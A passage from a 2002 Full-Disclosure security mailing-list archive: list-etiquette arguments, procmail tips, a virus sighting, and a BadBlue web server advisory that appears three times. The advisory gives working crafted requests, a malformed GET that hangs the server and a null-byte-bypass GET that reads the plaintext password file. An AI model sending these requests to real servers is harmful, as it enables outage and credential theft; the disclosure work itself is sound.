would also be great if you could get them to also post them here. I wanted to note something that I'm sure many people already are aware of. Without moderating the list you're always going to see alot of useless discussion. In the interests of non-censorship and free disseminatin of information we do NOT want to moderate or control anyone's ability to be heard. That being said, complaining about the noise only adds to the noise. Thanks! Len PS .. would folks mind if we post the charter once a month via an automated message, much like the sun-managers mailing list? From dufresne at winternet.com Fri Jul 12 15:32:19 2002 From: dufresne at winternet.com (Ron DuFresne) Date: Fri, 12 Jul 2002 09:32:19 -0500 (CDT) Subject: [Full-Disclosure] Suggestion/Comments In-Reply-To: <20020712102537.T24902@netsys.com> Message-ID: Perhaps posting of the charter monthly would help remind folks of the focus of the list and reduce not only signal to nooise, but offenses like vacation messages to the list and such, not to mention html posts... Of course, after a chater has been ratified ... thanks, Ron DuFresne On Fri, 12 Jul 2002, Len Rose wrote: > > One thing you can do to help out with the signal to noise > ratio might be to help spread the word about this list > and the premise behind it. If you work for a company or > organization that generates advisories, and other types of > intelligence it would also be great if you could get them > to also post them here. > > I wanted to note something that I'm sure many people already > are aware of. Without moderating the list you're always > going to see alot of useless discussion. In the interests > of non-censorship and free disseminatin of information we > do NOT want to moderate or control anyone's ability to be > heard. > > That being said, complaining about the noise only adds to > the noise. > > Thanks! > > Len > > PS .. would folks mind if we post the charter once a month > via an automated message, much like the sun-managers > mailing list? > > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From SkyLined at edup.tudelft.nl Fri Jul 12 16:05:20 2002 From: SkyLined at edup.tudelft.nl (Berend-Jan Wever) Date: Fri, 12 Jul 2002 17:05:20 +0200 Subject: [Full-Disclosure] crash IE using jscript and page transitions Message-ID: <001101c229b5$8a77c680$1b59a182@grotedoos> (on my site: http://spoor12.edup.tudelft.nl/SkyLined v4.2/?Advisories/Microsoft Internet Explorer/Page transition DoS) The problem Internet Explorer 6.0 can be made to throw an exception using specially crafted jscript commands and page transitions. Other versions are probably vulnerable too but this has not been tested. Problems arise when a page transition is activated by a new page when the old page has not been rendered yet. This situation can occur when javascript redirects the browser before the page is fully rendered. An example The following two pages, called 1.html and 2.html, crash IE with an Access violation in mshtml.dll when 1.html is loaded into IE. 1.html: 2.html: Impact Seems to be just a minor bug resulting in a DoS. Berend-Jan Wever aka SkyLined http://spoor12.edup.tudelft.nl/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020712/4bb1f95e/attachment.html From BlueBoar at thievco.com Fri Jul 12 17:54:17 2002 From: BlueBoar at thievco.com (Blue Boar) Date: Fri, 12 Jul 2002 09:54:17 -0700 Subject: [Full-Disclosure] crash IE using jscript and page transitions References: <001101c229b5$8a77c680$1b59a182@grotedoos> Message-ID: <3D2F09B9.80608@thievco.com> From csnow at deltadentalwa.com Fri Jul 12 20:06:27 2002 From: csnow at deltadentalwa.com (Snow, Corey) Date: Fri, 12 Jul 2002 12:06:27 -0700 Subject: [Full-Disclosure] New W32.Gibe variant making the rounds? Message-ID: I just a little while ago was informed by my mail system admin that a message intended for me had been snagged by our mail filters as containing the W32_GibeA virus. Many of you probably remember that this was the little bugger that went around under the guise of a Microsoft Security update and had an attachment called Q216309.exe, which was actually a backdoor and massmailer with its own SMTP engine. Well, this one seemed to be a bit different. It had a return address of "pgp-key-request at hostmaster.org" and the subject line was "Introduction on ADSL". I've requested a copy of the original message. If and when I receive it, I'll forward any other relevant details along. I'm assuming that this is an attempt to tart up the original W32.Gibe virus and cause a new round of infections. Apologies if this is something that is already seen; I was concerned that a new social-engineering attempt using the old Gibe virus was being made. Regards, Corey Snow ######################################################### The information contained in this e-mail and subsequent attachments may be privileged, confidential and protected from disclosure. This transmission is intended for the sole use of the individual and entity to whom it is addressed. If you are not the intended recipient, any dissemination, distribution or copying is strictly prohibited. If you think that you have received this message in error, please e-mail the sender at the above e-mail address. ######################################################### From measl at mfn.org Sat Jul 13 01:49:04 2002 From: measl at mfn.org (Alif The Terrible) Date: Fri, 12 Jul 2002 19:49:04 -0500 (CDT) Subject: [Full-Disclosure] New W32.Gibe variant making the rounds? In-Reply-To: Message-ID: On Fri, 12 Jul 2002, Snow, Corey wrote: > I just a little while ago was informed by my mail system admin that a > message intended for me had been snagged by our mail filters as containing > the W32_GibeA virus. Many of you probably remember that this was the little > bugger that went around under the guise of a Microsoft Security update and > had an attachment called Q216309.exe, which was actually a backdoor and > massmailer with its own SMTP engine. > > Well, this one seemed to be a bit different. It had a return address of > "pgp-key-request at hostmaster.org" and the subject line was "Introduction on > ADSL". I've requested a copy of the original message. If and when I receive > it, I'll forward any other relevant details along. I'm assuming that this is > an attempt to tart up the original W32.Gibe virus and cause a new round of > infections. > > Apologies if this is something that is already seen; I was concerned that a > new social-engineering attempt using the old Gibe virus was being made. > > Regards, > > Corey Snow You're about a week and a half late on this one. -- Yours, J.A. Terranson sysadmin at mfn.org If Governments really want us to behave like civilized human beings, they should give serious consideration towards setting a better example: Ruling by force, rather than consensus; the unrestrained application of unjust laws (which the victim-populations were never allowed input on in the first place); the State policy of justice only for the rich and elected; the intentional abuse and occassionally destruction of entire populations merely to distract an already apathetic and numb electorate... This type of demogoguery must surely wipe out the fascist United States as surely as it wiped out the fascist Union of Soviet Socialist Republics. The views expressed here are mine, and NOT those of my employers, associates, or others. Besides, if it *were* the opinion of all of those people, I doubt there would be a problem to bitch about in the first place... -------------------------------------------------------------------- From mattmurphy at kc.rr.com Sat Jul 13 01:50:16 2002 From: mattmurphy at kc.rr.com (Matthew Murphy) Date: Fri, 12 Jul 2002 19:50:16 -0500 Subject: [Full-Disclosure] Three BadBlue Vulnerabilities Message-ID: <000f01c22a07$41826f00$e62d1c41@kc.rr.com> Advisory: Working Resources BadBlue Multiple Vulnerabilities Issue: Three vulnerabilities; a denial of service, an insecurity in password storage, and a file disclosure vulnerability that could allow viewing of the password file. Risk: Critical SecurityFocus: "Working Resources BadBlue Invalid Get Request Denial of Service Vulnerability" describes one of these issues. Invalid GET Request Vulnerability ---------------------------------- By sending a specially crafted GET request (specifically, one with no filename component) it is possible to cause the server to stop handling further requests. The administrator must fully exit and manually restart the server to resume normal operation: GET HTTP/1.0 Some servers withstood this, but balked at a similar request: GET HTTP/1.0 The only difference here being two spaces instead of one. Malformed Escaping Invalid Byte Vulnerability ----------------------------------------------- By sending a malformed version of an HTTP-escaped NULL byte ("%00") BadBlue can be forced to return the source code of the desired file (or the binary content if the file is a binary). This vulnerability can be used to read the contents of EXT.INI, which stores BadBlue's configuration data, including any users or Access Control Lists (ACLs) on the server and the passwords for any such data, as well. The attacker simply appends ".% 00.txt" to the filename. BadBlue appears to strip spaces after HTTP-escaping, but does this after null-byte filtering has already been applied, causing this specially designed request to bypass the filter: GET /ext.ini.% 00.txt HTTP/1.0 Will reveal the contents of the BadBlue configuration file. If the server is configured to allow uploads, but not to allow read/execute access without a password, this can be used to break the password protection. Un-encrypted Password Vulnerability -------------------------------------- This vulnerability involves the password storage in the aforementioned ext.ini file. The vulnerability allows a local user with read access to the configuration file to see any passwords for secured resources or user accounts. BadBlue stores the passwords with no encryption at all, meaning that simply opening the file is sufficient for password theft. Combined with the above vulnerability, this enables a remote user to read the passwords of any BadBlue server. From mattmurphy at kc.rr.com Sat Jul 13 01:50:16 2002 From: mattmurphy at kc.rr.com (Matthew Murphy) Date: Fri, 12 Jul 2002 19:50:16 -0500 Subject: [Full-Disclosure] Three BadBlue Vulnerabilities Message-ID: <000f01c22a07$41826f00$e62d1c41@kc.rr.com> Advisory: Working Resources BadBlue Multiple Vulnerabilities Issue: Three vulnerabilities; a denial of service, an insecurity in password storage, and a file disclosure vulnerability that could allow viewing of the password file. Risk: Critical SecurityFocus: "Working Resources BadBlue Invalid Get Request Denial of Service Vulnerability" describes one of these issues. Invalid GET Request Vulnerability ---------------------------------- By sending a specially crafted GET request (specifically, one with no filename component) it is possible to cause the server to stop handling further requests. The administrator must fully exit and manually restart the server to resume normal operation: GET HTTP/1.0 Some servers withstood this, but balked at a similar request: GET HTTP/1.0 The only difference here being two spaces instead of one. Malformed Escaping Invalid Byte Vulnerability ----------------------------------------------- By sending a malformed version of an HTTP-escaped NULL byte ("%00") BadBlue can be forced to return the source code of the desired file (or the binary content if the file is a binary). This vulnerability can be used to read the contents of EXT.INI, which stores BadBlue's configuration data, including any users or Access Control Lists (ACLs) on the server and the passwords for any such data, as well. The attacker simply appends ".% 00.txt" to the filename. BadBlue appears to strip spaces after HTTP-escaping, but does this after null-byte filtering has already been applied, causing this specially designed request to bypass the filter: GET /ext.ini.% 00.txt HTTP/1.0 Will reveal the contents of the BadBlue configuration file. If the server is configured to allow uploads, but not to allow read/execute access without a password, this can be used to break the password protection. Un-encrypted Password Vulnerability -------------------------------------- This vulnerability involves the password storage in the aforementioned ext.ini file. The vulnerability allows a local user with read access to the configuration file to see any passwords for secured resources or user accounts. BadBlue stores the passwords with no encryption at all, meaning that simply opening the file is sufficient for password theft. Combined with the above vulnerability, this enables a remote user to read the passwords of any BadBlue server. From mattmurphy at kc.rr.com Sat Jul 13 01:50:16 2002 From: mattmurphy at kc.rr.com (Matthew Murphy) Date: Fri, 12 Jul 2002 19:50:16 -0500 Subject: [Full-Disclosure] Three BadBlue Vulnerabilities Message-ID: <000f01c22a07$41826f00$e62d1c41@kc.rr.com> Advisory: Working Resources BadBlue Multiple Vulnerabilities Issue: Three vulnerabilities; a denial of service, an insecurity in password storage, and a file disclosure vulnerability that could allow viewing of the password file. Risk: Critical SecurityFocus: "Working Resources BadBlue Invalid Get Request Denial of Service Vulnerability" describes one of these issues. Invalid GET Request Vulnerability ---------------------------------- By sending a specially crafted GET request (specifically, one with no filename component) it is possible to cause the server to stop handling further requests. The administrator must fully exit and manually restart the server to resume normal operation: GET HTTP/1.0 Some servers withstood this, but balked at a similar request: GET HTTP/1.0 The only difference here being two spaces instead of one. Malformed Escaping Invalid Byte Vulnerability ----------------------------------------------- By sending a malformed version of an HTTP-escaped NULL byte ("%00") BadBlue can be forced to return the source code of the desired file (or the binary content if the file is a binary). This vulnerability can be used to read the contents of EXT.INI, which stores BadBlue's configuration data, including any users or Access Control Lists (ACLs) on the server and the passwords for any such data, as well. The attacker simply appends ".% 00.txt" to the filename. BadBlue appears to strip spaces after HTTP-escaping, but does this after null-byte filtering has already been applied, causing this specially designed request to bypass the filter: GET /ext.ini.% 00.txt HTTP/1.0 Will reveal the contents of the BadBlue configuration file. If the server is configured to allow uploads, but not to allow read/execute access without a password, this can be used to break the password protection. Un-encrypted Password Vulnerability -------------------------------------- This vulnerability involves the password storage in the aforementioned ext.ini file. The vulnerability allows a local user with read access to the configuration file to see any passwords for secured resources or user accounts. BadBlue stores the passwords with no encryption at all, meaning that simply opening the file is sufficient for password theft. Combined with the above vulnerability, this enables a remote user to read the passwords of any BadBlue server. From madduck at madduck.net Sat Jul 13 17:53:56 2002 From: madduck at madduck.net (martin f krafft) Date: Sat, 13 Jul 2002 18:53:56 +0200 Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: References: Message-ID: <20020713165356.GA27723@fishbowl.madduck.net> also sprach Ron DuFresne [2002.07.11.2010 +0200]: > > BTW, spewing "[full-disclosure]" into the subject line is a very annoying > > thing for a list to do. > > > > Actually, it makes it quite easy for procmail recipies and certain mail > readers to filter and categorize the messages. there are many other headers one may use. e.g., i use: * ^List-Id:.*full-disclosure\.lists\.netsys\.com i do consider [Full-Disclosure] in the subject line rather annoying because it wastes valuable subject space. good mailing lists have subject lines that allow the pre-elimination of anything that doesn't concern one. especially if it's high traffic, this is something more than necessary. i vote to take the subject prefix off. it would also be nice to have received headers cut off when the listprocessor starts its job on such a public mailing list. -- martin; (greetings from the heart of the sun.) \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck wind catches lily, scattering petals to the ground. segmentation fault. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020713/635409e3/attachment.bin From madduck at madduck.net Sat Jul 13 17:55:16 2002 From: madduck at madduck.net (martin f krafft) Date: Sat, 13 Jul 2002 18:55:16 +0200 Subject: [Full-Disclosure] ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! In-Reply-To: <20020712015007.38EC318FBD@mail.zedz.net> References: <20020712015007.38EC318FBD@mail.zedz.net> Message-ID: <20020713165516.GB27723@fishbowl.madduck.net> also sprach Nomen Nescio [2002.07.12.0350 +0200]: > Bugtraq moderator will not post your message if you are GOBBLES or not liked. because GOBBLES is ridiculous! > death to anti.security.ls > death to project mayhem > Security Focus wants to be to security what Microsoft is to desktop > Does not ISS own this title you apparently have no clue. just shut up, please. -- martin; (greetings from the heart of the sun.) \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck nobody expects the spanish inquisition. -- monty python -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020713/7374ee34/attachment.bin From list0570 at paradise.net.nz Sat Jul 13 23:06:20 2002 From: list0570 at paradise.net.nz (V K) Date: Sun, 14 Jul 2002 10:06:20 +1200 Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: <20020713165356.GA27723@fishbowl.madduck.net> References: <20020713165356.GA27723@fishbowl.madduck.net> Message-ID: <20020713220620.GA3694@paradise.net.nz> This list is run by mailman. I have made procmail filters for several list managers, see http://volker.orcon.net.nz/soft/procmail/ Use like: # file away all mailman passwords LISTFOLDER=mailmanpass-List INCLUDERC=$PROCDIR/lm_mailman-member.rc LISTNAME="full-disclosure" LISTSERVERDOMAIN="lists.netsys.com" LISTFOLDER=full-disclosure-List INCLUDERC=$PROCDIR/lm_mailman.rc > i do consider [Full-Disclosure] in the subject line rather annoying Dito, but I don't know whether mailman can do otherwise. > it would also be nice to have received headers cut off when the > listprocessor starts its job on such a public mailing list. ABSOLUTELY. The "full-disclosure" does not refer to all the posters' details as well, or? Volker From SkyLined at edup.tudelft.nl Sun Jul 14 00:08:21 2002 From: SkyLined at edup.tudelft.nl (Berend-Jan Wever) Date: Sun, 14 Jul 2002 01:08:21 +0200 Subject: [Full-Disclosure] Re:Flares and personal opinions References: <20020713165356.GA27723@fishbowl.madduck.net> <20020713220620.GA3694@paradise.net.nz> Message-ID: <003201c22ac2$2f1e1d80$1b59a182@grotedoos> This is not a disclosure, just another attempt to stop these nonsense flares on this new list. Please delete if you are not interested with my apologies for bothering you. 1) I feel that if you have a problem with stuff like '[Full-disclosure]' being added to the email's topic, that this is your personal problem: deal with it yourself and stop whining to people who really don't care. By subscribing to this list, I assume you have basic knowledge of computer programming: write a small program or script that filters your email and removes this from the subject line. I personally am all in favor of these additions to the subject line. 2) Could everybody who doesn't have any information or disclosure to post, please not post at all ? Just to take a random example, I quote martin f krafft: -------------------------------------------------------------------------------- also sprach Nomen Nescio [2002.07.12.0350 +0200]: > Bugtraq moderator will not post your message if you are GOBBLES or not liked. because GOBBLES is ridiculous! > death to anti.security.ls > death to project mayhem > Security Focus wants to be to security what Microsoft is to desktop > Does not ISS own this title you apparently have no clue. just shut up, please. -------------------------------------------------------------------------------- True: If you have no clue, please shut up, that goes for anybody that doesn't have any usefull information to post which includes you martin. (And because I feel I have to post this message, even though it doesn't include any vulnerability or exploit, me too. Sorry about that folks !) So, everybody who feels publicly humiliated by this email or who wants to rant on any other non full-disclosure subject: I can be contacted at skylined at edup.tudelft.nl, If you feel I've wronged you: write ME; if you can convince me that you are right, I'll personally apologise on full-disclosure and reinstate your h4x0r status for you ;) Also, I you agree with me on this subject, please do not post to full-disclosure just to tell everybody you do: nobody cares. I propose that everybody who's subscribed to this list SPAMS anybody who posts another useless flare. I personally intend to. Berend-Jan Wever aka SkyLined http://sppor12.edup.tudelft.nl -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020714/8b7ed781/attachment.html From SkyLined at edup.tudelft.nl Sun Jul 14 01:15:48 2002 From: SkyLined at edup.tudelft.nl (Berend-Jan Wever) Date: Sun, 14 Jul 2002 02:15:48 +0200 Subject: [Full-Disclosure] Anonymous surfing my ass! Message-ID: <000f01c22acb$9b46a0a0$1b59a182@grotedoos> (html: http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Anonymous surfing, NOT!) Anonymous surfing websites are written by incompetend programmers keen on your money and not your privacy; I tested a few of them and found them wanting: - Anonymizer.com (I have hacked my way out of Anonymizer 4 times before and they still lack proper filtering!) - The-cloak.com - Megaproy.com These were all the sites I found with google and could get acces to without registering, if you know some more, I'd be happy to hack my way out of their filters. I'd like to mention that all filter faults were found within minutes, just to show (off) how easy this was. Vendor status: hereby informed of the issue. Berend-Jan Wever aka SkyLined http://spoor12.edup.tudelft.nl PS. I'm going on a holiday, so I won't respond to any replies for about a week. Though luck! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020714/04417076/attachment.html From madduck at madduck.net Sun Jul 14 01:17:23 2002 From: madduck at madduck.net (martin f krafft) Date: Sun, 14 Jul 2002 02:17:23 +0200 Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: <20020713220620.GA3694@paradise.net.nz> References: <20020713165356.GA27723@fishbowl.madduck.net> <20020713220620.GA3694@paradise.net.nz> Message-ID: <20020714001723.GA28963@fishbowl.madduck.net> also sprach V K [2002.07.14.0006 +0200]: > Use like: > > # file away all mailman passwords > LISTFOLDER=mailmanpass-List > INCLUDERC=$PROCDIR/lm_mailman-member.rc > > LISTNAME="full-disclosure" > LISTSERVERDOMAIN="lists.netsys.com" > LISTFOLDER=full-disclosure-List > INCLUDERC=$PROCDIR/lm_mailman.rc Nice. > > i do consider [Full-Disclosure] in the subject line rather annoying > > Dito, but I don't know whether mailman can do otherwise. List admin interface -> General options -> "Prefix for subject line of list postings" > _______________________________________________ > Full-Disclosure - We believe in it. Can someone define "believe" please? Is this our mission statement? -- martin; (greetings from the heart of the sun.) \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck humpty was pushed. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020714/f6f8feda/attachment.bin From SkyLined at edup.tudelft.nl Sun Jul 14 01:37:52 2002 From: SkyLined at edup.tudelft.nl (Berend-Jan Wever) Date: Sun, 14 Jul 2002 02:37:52 +0200 Subject: [Full-Disclosure] Anonymous surfing my ass! (goproxy too) References: <000f01c22acb$9b46a0a0$1b59a182@grotedoos> Message-ID: <001d01c22ace$b0315d90$1b59a182@grotedoos> While checking if I really tried all the services I can find with google, I discovered goproxy. (www.goproxy.com) They were gone within 60 seconds too. Same old same old, forgot to take out the expression() DHTML. ----- Original Message ----- From: Berend-Jan Wever To: webmaster at www.the-cloak.com ; Full Disclosure (netsys) ; security at anonymizer.com ; bugs at megaproxy.com Sent: Sunday, July 14, 2002 2:15 Subject: [Full-Disclosure] Anonymous surfing my ass! (html: http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Anonymous surfing, NOT!) Anonymous surfing websites are written by incompetend programmers keen on your money and not your privacy; I tested a few of them and found them wanting: - Anonymizer.com (I have hacked my way out of Anonymizer 4 times before and they still lack proper filtering!) - The-cloak.com - Megaproy.com These were all the sites I found with google and could get acces to without registering, if you know some more, I'd be happy to hack my way out of their filters. I'd like to mention that all filter faults were found within minutes, just to show (off) how easy this was. Vendor status: hereby informed of the issue. Berend-Jan Wever aka SkyLined http://spoor12.edup.tudelft.nl PS. I'm going on a holiday, so I won't respond to any replies for about a week. Though luck! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020714/1c2ede7b/attachment.html From ulfh at Update.UU.SE Sun Jul 14 01:56:28 2002 From: ulfh at Update.UU.SE (Ulf H{rnhammar) Date: Sun, 14 Jul 2002 02:56:28 +0200 Subject: [Full-Disclosure] Re: Announcing new security mailing list In-Reply-To: <20020714001723.GA28963@fishbowl.madduck.net> References: <20020713165356.GA27723@fishbowl.madduck.net> <20020713220620.GA3694@paradise.net.nz> <20020714001723.GA28963@fishbowl.madduck.net> Message-ID: <20020714025628.A19510@Update.UU.SE> On Sun, Jul 14, 2002 at 02:17:23AM +0200, martin f krafft wrote: > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Can someone define "believe" please? Is this our mission statement? Following a strong emotion, that can't be backed up by facts? // Ulf From madduck at madduck.net Sun Jul 14 02:00:38 2002 From: madduck at madduck.net (martin f krafft) Date: Sun, 14 Jul 2002 03:00:38 +0200 Subject: [Full-Disclosure] Suggestion for this List Message-ID: <20020714010038.GA29515@fishbowl.madduck.net> Folks, Let me use this email to put forth a suggestion I have for the direction of this list. I think there's potential in such a forum, but I am also trying to stay realistic in terms of manageable informational density. One could call my suggestion "Append-only". I suggest that every post on this list shall bring out more relevant information on each issue, full disclosure, as the name implies. There should not be discussion nor questions. But it remains unmoderated and *any* (relevant!) information is welcome. if there is an issue that a subscrriber disagrees with, or is unsure about, then he shall contact the author of the post directly. Only after both parties are left without a misunderstanding, a follow-up post should inform the list. *Then* will this list will become a precious resource. Comments (privately if appropriate)? -- martin; (greetings from the heart of the sun.) \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck 1-800-psych: hello, welcome to the psychiatric hotline. if you are co-dependent, please ask someone to press 2. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020714/748eabc9/attachment.bin From hellnbak at nmrc.org Sun Jul 14 04:31:43 2002 From: hellnbak at nmrc.org (hellNbak) Date: Sat, 13 Jul 2002 23:31:43 -0400 (EDT) Subject: [Full-Disclosure] Anonymous surfing my ass! In-Reply-To: <000f01c22acb$9b46a0a0$1b59a182@grotedoos> Message-ID: On Sun, 14 Jul 2002, Berend-Jan Wever wrote: Combine an incompetant programmer with a wanna-be incompetant researcher and what do you get? A stupid advisory. First of all, you "hacked your way out of" Anonymizer. Does this mean that you paid for their service, then managed to surf without being anonymous? Or, you managed to get their pay service for free? Either way doesn't point at a vulnerability that would expose ones privacy. Now if you were telling us that you are able to expose the originating IP address of web requests coming from these services that would be something. > > Anonymous surfing websites are written by incompetend programmers keen on your money and not your privacy; I tested a few of them and found them wanting: > - Anonymizer.com (I have hacked my way out of Anonymizer 4 times before and they still lack proper filtering!) > - The-cloak.com > - Megaproy.com > These were all the sites I found with google and could get acces to without registering, if you know some more, I'd be happy to hack my way out of their filters. > I'd like to mention that all filter faults were found within minutes, just to show (off) how easy this was. > > Vendor status: hereby informed of the issue. > > Berend-Jan Wever aka SkyLined > http://spoor12.edup.tudelft.nl > > PS. I'm going on a holiday, so I won't respond to any replies for about a week. Though luck! > -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- "I don't intend to offend, I offend with my intent" hellNbak at nmrc.org http://www.nmrc.org/~hellnbak -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From nick at virus-l.demon.co.uk Sun Jul 14 05:41:03 2002 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Sun, 14 Jul 2002 16:41:03 +1200 Subject: [Full-Disclosure] Re:Flares and personal opinions In-Reply-To: <003201c22ac2$2f1e1d80$1b59a182@grotedoos> Message-ID: <0GZ8004KA2CGB6@smtp1.clear.net.nz> "Berend-Jan Wever" wrote: Nothing personal dude, but ... Coming from someone who posts with: > X-Mailer: Microsoft Outlook Express 6.00.2600.0000 and is too clueless to even configure it to prevent its obvious and usual crap such as: > ------=_NextPart_000_002F_01C22AD2.F27DBAA0 > Content-Type: text/html; > charset="iso-8859-1" > Content-Transfer-Encoding: quoted-printable <> this: <> > ... I'll personally apologise on full-disclosure and reinstate > your h4x0r status for you ;) <> is the best laugh on this list yet. (If you don't understand my point, just disable the entirely unnecessary bandwidth wasting HTML-ized copy of the messages you post to this list. And those contemplating posting HTML-only messages -- just don't do it.) And yes, I know I'm posting to the list, but unlike most of the rest so far bitching about the crappy, off-topic posts, thi is on-topic. When you signed up, you got a confirmation request message. In part, it said: ... Send questions to full-disclosure-admin at lists.netsys.com. If you don't like the "[Full-Disclosure]" Subject: prefix, mail the list admin and ask for it to be changed. If you don't like the noise-to-signal ratio, mail the list admin. If you fail to get satisfaction from those approaches, consider unsubscribing as, while it remains an unmoderated list, some of the things people are so busy complaining about will remain facts of life. This is not rocket science but "Mailing lists 101"... Regards, Nick FitzGerald From benfell at greybeard95a.com Sun Jul 14 10:37:02 2002 From: benfell at greybeard95a.com (David Benfell) Date: Sun, 14 Jul 2002 02:37:02 -0700 Subject: [Full-Disclosure] Re:Flares and personal opinions In-Reply-To: <0GZ8004KA2CGB6@smtp1.clear.net.nz> References: <003201c22ac2$2f1e1d80$1b59a182@grotedoos> <0GZ8004KA2CGB6@smtp1.clear.net.nz> Message-ID: <20020714093701.GA1254@home.parts-unknown.org> On Sun, 14 Jul 2002 16:41:03 +1200, Nick FitzGerald wrote: > "Berend-Jan Wever" wrote: > > Nothing personal dude, but ... > Nonetheless, I felt he raised some valid points, even if I don't entirely agree with all of them. Simply because this is an unmoderated list does not mean that normal rules of list etiquette do not apply. Among them, as you pointed out, is the one about HTML e-mail. Having participated in a few flame wars myself, I'd hate to simply say that it's rude to flame. If we didn't care, we wouldn't get mad. And security is something to care about. So I'll say this about flaming instead: When you flame, at least say something substantial. Simply saying that something sucks really doesn't cut it. Explain why it sucks, so we at least have something to argue about. The posting about the anonymizing web sites is a classic example. He just said it's broken, with hardly any explanation of why it's broken. He didn't explain his testing procedure, nor did he explain what results he's looking for, contrasting them with the ones he actually got. Finally, he didn't explain how these results undermine their utility in anonymizing web access. Next, don't bother with old news. Old news is old news. It's dead. Just because you can't bury it doesn't mean you should drag the rotten corpse around and force the rest of us to take a whiff. The postings about the Bugtraq lists are old news. Those lists have been around for years. There's nothing new about how they're being administered so we really don't need to hear your general complaints about them here. Notice I said general complaints. If they're doing currently doing something specifically wrong with a specific issue, that's fair game, as long as you explain yourself. Next, keep personal attacks to a minimum. If somebody is being stupid (as opposed to ill-informed), it's reasonable to whack them with a clue stick. But remember, we're here to exchange information, so explain yourself. Simply saying someone is a stupid dumbfsck is not nearly so impressive an argument as explaining point by point why everything they said is simply wrong. There's an underlying theme here. Explain your position. You might be right, you might be wrong. Either, really, is okay, because even when you're wrong, we can show where you're wrong. Or maybe we're wrong in thinking you're wrong, in which case, you can argue back. We learn that way. The idea is that there always needs to be substance. As fellow humans, we might care about your emotions, but as administrators and programmers, we need information we can act on. Your anger is not something we can do a lot about. My last point on flames would have to do with frequently asked questions which are documented. Remember that just because you know where to find the answer to that question doesn't mean I do. And sometimes I can't figure out what search terms to use to get reasonable results from Google. Also, some documentation, including a lot of man pages, seems to presume you already know the answer. Good technical documentation is hard to come by, partly because most technical writers are hacks working for marketing departments. Documentation written by programmers, on the other hand, often suffers for a variety of reasons. So RTFM is often not an adequate response -- make allowance for that possibility. When flaming, it is important to do it well. Otherwise you may look like the bigger fool. And if done well, flames still contain valuable information that can be useful in ferreting out the greater truth surrounding any particular issue. And that is why we're here. -- David Benfell, LCP benfell at parts-unknown.org --- Resume available at http://www.parts-unknown.org/resume.html -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020714/2da6f5a6/attachment.bin From mail at blazde.co.uk Sun Jul 14 16:05:14 2002 From: mail at blazde.co.uk (Roland Postle) Date: Sun, 14 Jul 2002 16:05:14 +0100 Subject: [Full-Disclosure] Anonymous surfing my ass! References: Message-ID: <004501c22b47$dc0e1ce0$0a00a8c0@violetclub> > Combine an incompetant programmer with a wanna-be incompetant researcher > and what do you get? A stupid advisory. > > First of all, you "hacked your way out of" Anonymizer. Does this mean > that you paid for their service, then managed to surf without being > anonymous? Or, you managed to get their pay service for free? I think if you at least clicked the advisory link ( http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Anonymous surfing, NOT! ) it would help relieve some of your ignorance. What he's reffering to is a getting script (usually javascript) through the filters and executing on the 'anonymous' person's machine. If a site can do that they can save cookies to the machine, thereby breaking the anonymity. It's not really cross site scripting, though the techniques used to get it through are similar. Right now 'cross site scripting' seems to be the buzz word attached to any security breach involving scripts. Something we have to live with I guess. Anyway, whatever it's called SkyLined seems to be the l33test at it ;) - Blazde From steve at entrenchtech.com Sun Jul 14 16:35:39 2002 From: steve at entrenchtech.com (Steve) Date: Sun, 14 Jul 2002 09:35:39 -0600 Subject: [Full-Disclosure] Anonymous surfing my ass! In-Reply-To: <004501c22b47$dc0e1ce0$0a00a8c0@violetclub> Message-ID: <006301c22b4c$1e0afa60$6401a8c0@Laptop2> You would think that the email sent to the list would have contained more information. Based on the email sent, one would might not even bother clicking on the link. And for those of us who happen to be checking email on Windoze boxes, clicking on random Internet links probably isn't the brightest thing to do from IE unless you have bothered to disable all the various active scripting etc....... How seriously would you take an email that simply said "click here www.clicktobeowned.com" > I think if you at least clicked the advisory link ( 